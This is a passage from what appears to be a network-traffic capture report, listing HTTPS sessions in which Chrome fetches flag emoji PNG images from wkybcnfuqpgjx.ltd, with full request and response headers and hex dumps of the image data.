                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC899INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 4376
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-1118"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wv42Y354dbsNU6DtgDU%2Boef8WR9UfXLt%2FrThZItvOLoOwOTtxzKyq0mbRhSLSvHfjl%2BRo4NIOWaqgE4NEOJM2wVQ0pLbZSzu3VjzlAL1FwfTLrQsOY6XGFWT3M5gFQOrgTp0uQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3141ab543bf-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=5009&min_rtt=1628&rtt_var=2781&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1793611&cwnd=252&unsent_bytes=0&cid=3b20c5d33f667f65&ts=631&x=0"
                                  2025-01-12 00:04:04 UTC470INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 65 60 54 5e 59 4e cf b9 7b cf b9 7b 0c 1b 43 6b 6e 78 0a 1a 43 5e 6c 8e 84 6a 22 06 17 3f 61 6f 92 ce b8 7b 83 6a 23 0f 1e 44 64 72 95 5d 6b 8f 16 2c 5e cf b9 7b 82 69 22 06 17 3f 2a 3f 70 00 11 3a 60 6f 92 15 27 53 00 15 47 60 6e 91 84 6b 23 cf b8 7b 62 71 93 06 16 3e 3c 4b 75 66 74 96 84 6b 23 5f 6d 8f ce b8 79 06 17 3f d0 b9 7b 66 74 96 83 6a 23 08 18 40 5f 6d 8f cc b7 7a 84 6a 23 64 73 97 09 1a 41 cf b9 7b cf b9 7a cf b9 7a 5d 6c 8e 84 69 22 05 15 3d 79 82 97 33 45 70 ff f4 4c ff ea 4a ff e6 49 ff e3 48 ff e1 47 ff df 47 ff db 46 ff d9 46 ff d6 46 ff d4 45 ff d2 45 ff d3 3f ff d0 45 ff d1 3d ff d0 3e ff ce 45 fe ce 45 ff
                                  Data Ascii: PNGIHDRPLTEGpLe`T^YN{{CknxC^lj"?ao{j#Ddr]k,^{i"?*?p:`o'SG`nk#{bq><Kuftk#_my?{ftj#@_mzj#dsA{zz]li"=y3EpLJIHGGFFFEE?E=>EE
                                  2025-01-12 00:04:04 UTC1369INData Raw: 3d 51 81 3d 50 7e 38 50 88 59 4d 2c 38 4c 7b 35 4c 82 31 4c 8c 30 48 7e 4f 46 2b 2a 45 84 22 42 92 27 42 84 28 40 7b 45 3e 2a 1e 3d 89 29 3c 69 1e 3c 82 1c 3b 87 1b 3a 85 1f 39 7a 19 39 84 19 38 83 18 37 82 17 37 83 16 36 81 1a 35 77 16 35 7f 15 35 80 38 34 27 14 34 7f 14 33 7f 14 33 7d 0c 32 90 13 32 7d 14 31 79 15 31 76 12 31 7c 16 30 70 11 30 7a 0a 30 8c 10 30 7c 13 2f 73 11 2f 78 0a 2f 88 16 2f 68 0f 2f 7a 0f 2e 7a 30 2d 26 15 2d 67 0e 2d 79 0e 2d 77 0e 2c 76 0c 2c 78 16 2c 5d 11 2b 6a 0e 2b 70 0b 2b 76 14 2a 5f 0b 2a 75 0b 2a 74 14 29 5b 0b 29 72 29 28 26 09 28 74 0b 27 6c 08 27 72 07 27 73 26 26 26 0f 26 5d 07 26 6f 06 26 71 06 25 6f 06 25 6d 15 24 48 09 24 64 04 24 70 22 23 23 04 24 6c 04 23 6e 04 23 6c 0f 22 51 03 22 6c 03 21 6a 02 21 6b 1f 20 23
                                  Data Ascii: =Q=P~8PYM,8L{5L1L0H~OF+*E"B'B(@{E>*=)<i<;:9z987765w5584'433}22}1y1v1|0p0z00|/s/x//h/z.z0-&-g-y-w,v,x,]+j+p+v*_*u*t)[)r)(&(t'l'r's&&&&]&o&q%o%m$H$d$p"##$l#n#l"Q"l!j!k #
                                  2025-01-12 00:04:04 UTC1369INData Raw: aa c3 6d a9 6d 97 4d 08 86 8d 6a 62 bb f0 ac 0b 09 d7 5d 77 27 30 01 68 83 69 da 8e b4 a0 62 7b 19 67 da df cd 04 d9 69 5b 27 81 6d 86 eb 9e 69 46 b6 8f a9 e3 0d 80 7d bc 76 bb 74 29 42 57 42 19 3b 5f 10 46 92 a0 41 f1 24 72 4d 11 20 6d e8 1a d8 59 64 2c 1d ac c6 4a 6c 2d b5 61 00 6e 75 56 cc 07 b8 dd 80 b8 ff 47 e2 47 b6 35 1d 7c 3c 06 fc f0 8d aa 26 dd 01 8b 48 aa 3f a2 e2 2a 89 d2 6f 2f 30 8d 2d 13 83 ea 44 b7 36 33 80 f0 e2 83 ef 3f 3c e1 65 b2 de dc b8 d2 11 db 55 fe 2e 35 d1 18 6d e7 7a ef f0 bd 3f 16 b7 6c af cd 3c a3 d9 be 09 5e 85 ab 8a 24 e8 72 a7 1f 7f fb ec 9b 4f d2 0a ba 44 a8 4f 93 32 a8 79 b9 11 c6 ff 87 29 2f 99 1a 2c fd 7f c4 d8 4f 68 1c 55 1c c0 f1 ef cc 9b c9 ce 6c 92 6d 9a 6a 96 b4 ca 56 da 62 c5 16 89 55 db d4 b4 a4 10 11 72 91 52 bd
                                  Data Ascii: mmMjb]w'0hib{gi['miF}vt)BWB;_FA$rM mYd,Jl-anuVGG5|<&H?*o/0-D63?<eU.5mz?l<^$rODO2y)/,OhUlmjVbUrR
                                  2025-01-12 00:04:04 UTC1168INData Raw: ee e1 d9 bb 1f bf f1 e6 29 4c 9f de f5 36 31 5a cc 04 95 3d ab 17 f1 f9 05 fd 7a 98 a0 93 e5 5f 3e fe 64 bd 7e fc e1 8f 5e 3b 85 84 9f 18 18 83 31 90 e7 6d d4 c6 50 24 7b f2 b3 5f dc f9 dd 9d 3f ff f5 3e 6d 64 66 ec c3 73 d9 4f 6f ae c4 af bc 5f aa b9 09 b2 52 6e 00 c7 75 29 e6 40 04 86 fa 49 b3 5d 7f 85 55 95 fd 08 ce 4c cc 80 8a 7e 4c 4c af 16 b0 8e fc be 04 93 30 0c 03 4f 09 92 ae 31 4f 60 d7 2a 71 a5 7c 05 6c d0 7e 75 3b 31 0b e0 c2 d0 25 e0 5e 12 a4 c4 3e 04 a3 17 51 d1 2f 70 de 1a 3d db 25 b1 ff 35 14 14 10 86 21 7b 76 d2 d1 36 c7 36 61 a8 a0 30 7c 5c 8a d4 c3 a4 46 18 40 42 48 42 bf 83 db 7d 0c 26 00 19 18 b1 07 ca 44 4d c2 be 3d 41 49 b2 3b e6 0a a1 8f 88 a6 2d 2b c7 3e 5c a0 af 85 98 f6 e8 c6 b7 9f 9e 15 67 13 cf 65 0c 11 71 d0 4f ea 2b 5d 60 7f
                                  Data Ascii: )L61Z=z_>d~^;1mP${_?>mdfsOo_Rnu)@I]UL~LL0O1O`*q|l~u;1%^>Q/p=%5!{v66a0|\F@BHB}&DM=AI;-+>\geqO+]`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  127192.168.2.650082172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC608OUTGET /img-apple-160/1f1e7-1f1fe.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC894INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 4699
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-125b"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wR3DQSj4lhtRho0ugatl9jwTASfsEJ0FqyaS2WNG5u6Hm9TUntQORVFfRSYrjLAmYHfA99o9nWegBVPoOtOyBatie7GbEU76f4mGkK9nx9yJDMYMRLsCmoqYde5bDUwc%2FD5RBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e314d9c541ba-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=646&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1693735&cwnd=192&unsent_bytes=0&cid=de255bb82f23d4f7&ts=657&x=0"
                                  2025-01-12 00:04:04 UTC475INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 3e 57 27 8c 64 55 b5 bb bb ad 64 64 0b 4f 0b 0d 50 0d 7c 8d 8d ad 5c 5c bb 76 76 ab 66 66 0c 50 0c b1 64 64 0c 50 0c a3 40 40 16 6b 16 8c 17 17 b1 69 6a 0e 52 0e ba af af 0d 51 0d 99 63 63 98 ac ac 8f 8d 8d 7d 36 36 72 04 04 a6 ac ac b1 62 62 0a 4d 0a b3 70 70 0f 53 0f b3 65 65 0c 4f 0c be c4 c4 66 33 33 0f 51 0f b9 6a 6a 08 4c 08 b0 61 61 11 56 11 0a 4d 0a b6 b1 b1 ba 6b 6b ad 5e 5e 09 4d 09 77 83 83 77 75 75 e1 ff ff df fa fb dd f6 f7 de ef f0 db e8 e8 d5 e2 e2 d9 dc dd d1 d0 d0 d1 c3 c3 b6 c9 c9 cf b6 b6 b3 b8 b9 ca ab ab c8 a0 a0 a7 a9 a9 c6 97 97 c3 8f 8f af 95 95 9b 98 99 c3 86 86 c7 7c 7e ac 84 84 b9 7e 7e 92 89 89 c2
                                  Data Ascii: PNGIHDRPLTEGpL>W'dUddOP|\\vvffPddP@@kijRQcc}66rbbMppSeeOf33QjjLaaVMkk^^Mwwuu|~~~
                                  2025-01-12 00:04:04 UTC1369INData Raw: 26 d3 25 25 da 21 25 0e 8d 0f d1 25 25 b7 30 30 00 95 07 c2 2b 2b d2 24 24 ac 34 34 8c 42 3d ce 25 25 d1 23 23 d0 23 23 e2 19 25 15 84 15 b7 2d 2c 0b 8b 0b cf 22 22 44 6c 11 1d 7e 1a c5 25 26 eb 12 24 cd 21 21 ce 20 20 0a 88 0a c9 21 21 cc 1f 1f 08 87 08 b6 28 27 9b 33 2f cb 1d 1d c8 1e 1e 30 6f 0b 06 85 06 ca 1c 1c 10 7d 10 ad 28 27 17 77 17 c8 1b 1b 04 82 04 c5 1b 1b c7 19 19 bb 1e 1e 43 5e 0b 02 80 02 dc 0c 1b c5 18 18 75 3a 3a c3 17 17 07 7a 06 00 7e 00 af 1f 1e c3 15 15 15 6d 15 0e 71 0f 9f 23 23 c1 14 14 05 76 05 be 14 14 c1 12 12 be 12 12 15 67 15 b3 16 16 b0 17 17 b7 14 14 be 10 10 b9 11 11 5a 43 08 cd 06 11 bc 0f 0f aa 16 16 bb 0e 0e 04 6d 04 13 62 13 ba 0d 0d b7 0e 0e 90 1f 18 79 28 1f b9 0b 0b 09 65 09 b7 0b 0b b0 0d 0d 11 5d 11 b4 0b 0b b6 0a
                                  Data Ascii: &%%!%%%00++$$44B=%%####%-,""Dl~%&$!! !!('3/0o}('wC^u::z~mq##vgZCmby(e]
                                  2025-01-12 00:04:04 UTC1369INData Raw: 5d 42 5f 3f 15 19 ef 13 e8 2d 30 62 57 77 82 54 fa 5d e7 11 f5 87 d6 89 c3 06 87 16 9b 6a dc a3 2a 71 f9 8c 4a ac 07 82 11 05 70 3b 27 f8 d2 a5 7d 17 95 a9 d2 87 9f 4d fb 5f c5 52 24 43 79 4a e0 c7 dd 3c 01 9b 8e 3b 3c bd 40 99 7c 49 14 c8 be ef be 7e f6 47 eb d5 aa 6b 48 46 27 07 b4 1e 1e 6a bc ed ce 8b 80 2a 27 5f ee 04 e7 9a 6f 5c 5c 39 5a 30 4b 8d c1 09 46 5b 42 24 8b 3e a6 35 46 36 e9 25 0c 46 de c1 a7 f9 80 b9 25 cd 53 a6 1b a2 10 84 cf fa 0c 26 71 19 da 88 56 8b 49 f2 24 c8 58 d0 f8 25 11 87 4a 3f ed f9 3c ff 5c e3 e4 b3 7a f3 aa c6 46 da ad 07 28 25 03 09 bc 9b 4d 20 03 04 92 98 26 05 2a d0 39 52 be 78 c2 28 95 8b 73 4d d5 81 28 a1 31 5c e0 31 41 41 10 8c 7b 62 d2 3b b8 d0 48 fd fe de e9 6f 0b 37 38 9f 7f 5c 02 81 3f b0 6a 12 01 12 94 40 a2 fd d7
                                  Data Ascii: ]B_?-0bWwT]j*qJp;'}M_R$CyJ<;<@|I~GkHF'j*'_o\\9Z0KF[B$>5F6%F%S&qVI$X%J?<\zF(%M &*9Rx(sM(1\1AA{b;Ho78\?j@
                                  2025-01-12 00:04:04 UTC1369INData Raw: 02 8f b6 70 bc c6 1d 77 3a 9d 43 df db 12 cf 62 5f bf b1 87 ba 68 b6 24 4f 10 3b d0 33 dc 6e 05 d3 8f 0d 5f af 7e 80 96 5e 11 a4 5b 43 10 f5 2f 69 96 1c 95 da f1 4c 65 cf f8 8b 14 81 16 00 e0 84 7a cc 6f 37 45 a7 01 32 b1 a0 68 f0 74 cb 34 e0 e9 62 57 87 b4 03 8f 67 44 3c db d7 8a a6 29 90 02 1b 5c 10 44 39 0e 1a d8 d2 2c ed d3 73 43 6a 31 e5 4a a1 a0 1a 4e a3 25 8d 81 04 ff bf 99 4c 40 04 33 d4 16 74 97 6c e6 84 ab be d6 81 66 ee 76 95 9d 97 84 b3 84 14 33 e4 26 fa 10 10 02 0a 7d 62 b0 af 8f 93 62 b1 74 a4 97 41 e2 69 1d d5 c5 a5 3e be 8c 06 04 f0 bf 34 e2 04 73 b0 4c 5e ff 9a 29 c4 81 94 50 d2 7f 0a e7 db 12 ea e0 04 32 53 e0 28 40 6c e8 48 69 30 d0 0b b4 d9 c1 3e dd 4e 60 47 a5 43 3d bc 2d a3 0a ad b6 b2 4f 2c 53 5b 50 d5 9e fc e6 90 d5 9e bf e9 45 f9
                                  Data Ascii: pw:Cb_h$O;3n_~^[C/iLezo7E2ht4bWgD<)\D9,sCj1JN%L@3tlfv3&}bbtAi>4sL^)P2S(@lHi0>N`GC=-O,S[PE
                                  2025-01-12 00:04:04 UTC117INData Raw: 05 a5 52 be 60 59 ee d9 7a 84 5c 9b 90 20 f2 18 77 bc 11 77 00 1b 90 42 e2 23 a4 00 8f fc 7c d7 ae 28 e9 58 0b fa 4f 92 1a fa 3e aa 3f de 30 c7 72 2c bb 58 72 4c db 65 ec 51 a8 85 a2 7b 6b 5e 55 75 3c 1c 90 de 1b 81 6b d1 a4 49 93 26 4d 9a 34 69 d2 a4 49 93 26 4d 9a 34 69 d2 a4 c9 78 e0 7f fd bc 9e 5e 14 f1 67 88 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: R`Yz\ wwB#|(XO>?0r,XrLeQ{k^Uu<kI&M4iI&M4ix^gIENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  128192.168.2.650084172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC370OUTGET /img-apple-160/1f1e7-1f1f8.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC901INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 4321
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-10e1"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 2
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcyIOmTAL%2FH%2FqUDf9fmr7b5wv7ogJE5%2FaQgVP60npT62a0p1azoT79MjC25B5Q9Ch3oUJQRt3qonIiVntjd%2BYUFN6RGiiOAhzotFV5spo1TbWmp1pO3c4Gg%2BOSdsr5nAD0gqxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e315189643f4-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=1608&rtt_var=1524&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=948&delivery_rate=551672&cwnd=194&unsent_bytes=0&cid=5ad4d5c09e782021&ts=134&x=0"
                                  2025-01-12 00:04:04 UTC468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 1e 65 71 63 a6 b1 0d 55 61 5c a1 ac 0c 58 64 67 a9 b4 0b 54 60 0c 57 64 5c a2 ae a7 96 3c 78 8c 55 17 79 8a 13 69 79 69 ab b6 0b 56 62 5f a2 ad 0b 59 66 19 16 16 00 00 00 5f a2 ad 0e 59 66 00 00 00 69 ac b7 06 51 5d 12 5e 6b 62 a4 af 07 52 5e 0b 57 64 6a ac b7 0c 58 65 60 a1 ad 0d 59 66 6b ad b8 5b 9f ab 11 5d 6a 09 4f 5b 06 52 5f ff fe 63 ff f7 5f fd f3 63 ff ee 5f ff ea 4d ff e8 54 ff e6 5b ff e7 4c fb e4 5e fb e3 5e f9 e3 5d ff e2 52 f8 e2 5c ff e0 4b f6 df 59 fe db 44 f2 dc 56 e5 de 66 ef d9 54 ed d7 50 d4 db 70 f8 d2 3d ea d4 4e e7 d1 4b f5 cb 35 c3 d6 76 e4 ce 48 e3 cb 45 d4 cd 5a e0 ca 44 b2 d5 84 bb d0 72 de c7 41 dc
                                  Data Ascii: PNGIHDRPLTEGpLeqcUa\XdgT`Wd\<xUyiyiVb_Yf_YfiQ]^kbR^WdjXe`Yfk[]jO[R_c_c_MT[L^^]R\KYDVfTPp=NK5vHEZDrA
                                  2025-01-12 00:04:04 UTC1369INData Raw: a6 bb 09 b1 de 4e 98 a5 3c 9f b0 1b ab c4 0d ae d5 1b aa c2 20 a7 be 19 a9 c1 0e ad c8 8d 86 42 3d 99 a8 1f a4 ba 17 a7 bf 65 90 67 2a 9f b3 33 9f 97 04 aa d8 15 a5 be 15 a4 bc 1e a0 b6 2a 9b ae 07 a6 cd 13 a2 bb 3e 90 9e 12 a1 b9 1b 9d b3 2b 96 a9 1e 9a af 10 9f b8 10 9d b5 0f 9c b4 14 9a b1 00 9d cb 0d 9b b3 16 97 ad 1c 95 a7 0b 99 b1 7e 75 3b 0d 97 af 09 98 b0 32 89 91 00 98 c4 08 97 af 16 91 a5 08 96 ae 1a 8e a2 08 95 ad 0e 92 a9 05 94 ac 00 93 be 1b 8a 9d 03 92 aa 02 90 a8 11 89 9e 01 8f a7 00 8c b9 03 8e a6 00 8d b0 17 85 97 01 8d a5 08 8a a0 73 67 32 18 7f 90 05 84 9a 0b 7e 92 15 79 89 14 76 87 62 5b 33 04 79 8e 14 71 81 12 6d 7c 07 71 83 10 68 77 04 6c 7e 0e 65 73 13 61 6e 0f 5e 6b 05 5f 6e 0e 5a 67 4a 45 2b 38 47 49 05 59 67 07 55 63 04 52 5f 03
                                  Data Ascii: N< B=eg*3*>+~u;2sg2~yvb[3yqm|qhwl~esan^k_nZgJE+8GIYgUcR_
                                  2025-01-12 00:04:04 UTC1369INData Raw: a5 87 9d d0 a2 22 70 78 4c d0 20 de bb 72 e0 b1 b5 46 5d 03 42 30 f2 bd 17 96 57 fa 30 10 f0 f8 40 80 5d 63 14 96 e0 e8 83 10 76 81 e2 05 5c dd 06 04 94 b1 64 53 81 96 08 04 2d 78 ef 06 e5 71 81 92 70 e3 6a f9 61 61 a0 3c de 07 f6 80 d1 87 20 75 60 dd 06 70 3c 20 2e 54 40 a7 8e 07 44 8c 5e 7d e3 b5 0f e5 03 c1 7b 42 e5 00 71 30 0e 14 02 0c 81 0e 5f a3 8d 03 b1 aa 40 67 c4 56 ad ec 24 10 7d 42 20 a2 4d fb 9d ab 8b cb 53 80 b1 00 e9 23 71 5d 1d 94 38 f0 75 db 50 a8 72 ad 27 81 ca a4 13 40 e4 a4 40 24 73 6b df 58 bb 64 bc 87 10 1c b1 02 63 01 ca 68 83 11 89 40 3f a2 4d 4a d5 74 a0 31 49 04 a2 01 21 54 87 c4 91 1c 1b 88 24 d2 be f6 dc 4f 34 07 81 c0 a1 c0 d2 e1 21 d4 6c 75 a0 4e c6 80 c6 6a 03 51 28 84 52 2a a0 6e c6 36 73 0c 20 82 51 6f 3f ab 1e 50 81 10 77
                                  Data Ascii: "pxL rF]B0W0@]cv\dS-xqpjaa< u`p< .T@D^}{Bq0_@gV$}B MS#q]8uPr'@@$skXdch@?MJt1I!T$O4!luNjQ(R*n6s Qo?Pw
                                  2025-01-12 00:04:04 UTC1115INData Raw: 60 a0 36 87 5f 68 9f 02 18 0a 56 ff 88 47 57 4a 80 db 5d 37 71 0d 31 69 ab 01 8f 31 12 70 7a 60 3e b8 f6 b9 07 3e b2 d5 9e 72 4f a2 98 1a 7d ac a1 0a b9 2f 40 b1 c5 ad ff 7c 2e be e5 1f 01 a1 7e db 89 02 8e 1c aa 30 8c 8d a5 54 40 cf e9 80 69 b2 f6 77 6f 5d b1 8e 03 2e 13 eb 15 18 81 89 d6 d6 d4 06 7b ac 8e 40 34 98 32 ce cd 9c 0a 28 29 d7 ff 74 f1 a2 20 07 01 15 f5 a8 a9 93 47 a3 f1 37 2c f5 d1 a8 7b 03 16 5b df fb ab 4b 2b e5 54 20 10 a6 77 19 ea c0 b1 c1 23 d4 70 b8 cc 53 9e 0a 18 6c b2 fe e2 0b 3f 9d 95 4c 02 f5 e4 cc 02 f5 55 cc a6 8f e7 25 ef fb d0 06 6a d3 6f 27 07 e6 e5 ea df 6f 5c 29 d9 03 52 9b 59 a8 d9 0c 00 76 12 98 d6 27 30 a9 cd 0f 9e 18 68 92 db d7 fe e6 91 46 98 3a b3 00 0e c0 d7 68 0c 81 87 8c 88 da da 0c eb c9 81 41 65 ac 3e ff e6 15 15
                                  Data Ascii: `6_hVGWJ]7q1i1pz`>>rO}/@|.~0T@iwo].{@42()t G7,{[K+T w#pSl?LU%jo'o\)RYv'0hF:hAe>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  129192.168.2.650085172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:03 UTC370OUTGET /img-apple-160/1f1e6-1f1f9.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC896INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 4129
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1021"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 2
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFuTFbADGdovsCXdO4PyZMBh5AWG%2F4Klmy23Y0Nso3dUmHzHMF7BpA42MmJV1ihkMB9VmWPmGWAK5r70VpaxZhIqmJ69bQ8%2FRcXaogt0yY%2F8at8Kxf63wOtuyhztBEaCmV8efA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3153aad41b2-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1685&rtt_var=842&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4226&recv_bytes=948&delivery_rate=312433&cwnd=220&unsent_bytes=0&cid=ca308cd2d120f64d&ts=144&x=0"
                                  2025-01-12 00:04:04 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 79 22 1f c1 75 73 76 1e 1c bc 6e 6c 74 1c 19 c3 77 75 74 1e 1b c1 76 74 75 1f 1c b9 6a 67 ab b6 b6 a9 a9 a9 9d 2f 2a c3 7a 78 75 1d 1a b6 62 60 bf 74 71 75 1e 1b 93 94 94 8d 57 54 86 16 13 98 30 2c ba 6f 6d 75 1c 1a c5 79 77 75 1e 1b a6 4d 4a bd 71 6e 75 1e 1b c6 7a 78 75 1d 1a bc 71 6e 74 1e 1b c6 7a 78 7a 22 20 6e 17 14 c4 78 76 b8 6c 6a a6 47 44 ff ff ff fe ff ff fd fe fe fa ff ff fc fc fc f4 ff ff fb fb fb fa fa fa f9 f9 f9 f9 f8 f8 f7 f8 f8 f7 f6 f6 ea fa fb f5 f5 f5 f4 f3 f3 ea f7 f7 f3 f2 f2 f1 f1 f2 fc eb eb f0 f0 f0 ef f0 f0 e0 f5 f6 ee ee ee ec ec ec dd f1 f1 ea ea ea f6 e5 e4 fc e0 df e8 e8 e8 dc ed ed e3 ea ea e7
                                  Data Ascii: PNGIHDRPLTEGpLy"usvnltwutvtujg/*zxub`tquWT0,omuywuMJqnuzxuqntzxz" nxvljGD
                                  2025-01-12 00:04:04 UTC1369INData Raw: d5 52 4d ec 48 43 ee 47 42 ec 47 42 c1 59 56 e7 49 44 ea 47 42 ec 46 41 eb 45 40 ee 43 3d b4 5b 59 e8 45 40 ea 44 3f c9 51 4d e9 43 3e e2 45 40 b7 57 54 e6 43 3e d7 48 43 e6 41 3c ed 3e 39 e6 3f 3a e3 3f 3a b8 51 4d cd 47 43 dc 40 3c e2 3d 38 c0 4b 48 ed 38 32 e1 3c 37 de 3b 36 e0 3a 35 d4 3e 3a e4 37 31 dd 39 34 ec 32 2d cb 3f 3b dd 37 32 c2 42 3e da 37 32 db 35 30 d2 38 33 ec 2d 27 d8 34 2f c9 3a 36 e3 2f 2a d7 32 2d d1 33 2e c1 39 35 cc 34 2f d5 30 2b e5 29 23 d1 30 2b c9 33 2f d4 2e 29 da 2a 25 d2 2d 28 c0 34 2f b6 37 34 ce 2d 28 d1 2b 26 d0 2a 25 c7 2d 29 cd 2a 25 b8 32 2e dd 22 1d ce 28 23 cb 29 24 ad 35 31 cc 27 22 c2 2a 25 c9 27 22 b9 2d 28 c7 26 21 af 30 2c ca 24 1f a1 34 31 c6 24 20 c7 23 1e c3 24 1f d5 1c 16 c6 22 1d c4 22 1d bf 23 1e b5 26 22
